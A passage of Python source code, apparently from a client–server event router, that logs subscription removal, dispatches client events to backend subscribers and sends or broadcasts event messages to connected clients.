logger.error("Trying to remove non-existing subscription of "
+ str(subscriber)
+ ("" if event is None else " to " + str(event)))
def dispatchToSubscribers(self, event, data, sender):
"""
This is the main router function for client side events. All
client events will be handled here and dispatched to
backend subscribers.
Raises:
KeyError: If event is not in events list
"""
try:
for subscriber in self.eventSubscriptions[event]:
try:
subscriber.notify(event, data, sender.peer)
except (AttributeError, TypeError) as e:
logger.error(str(e))
except KeyError:
logger.warning("Received unsubscribed event " + str(event)
+ " from " + sender.peer)
def triggerEvent(self, event, data, addr=None):
"""
Sends an event to the client of the given address. If
not address is given, the event is broadcasted to all clients
"""
payload = utils.construct_event_json(event, data)
logger.debug(payload)
if addr is None:
for _, client in self.clients.items():
client.sendMessage(payload, isBinary = False)
elif addr in self.clients:
self.clients[addr].sendMessage(payload, isBinary=False)
else:
logger.error("Client {} disconnected. Message not sent".format(addr))
| 39.95098 | 91 | 0.600491 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.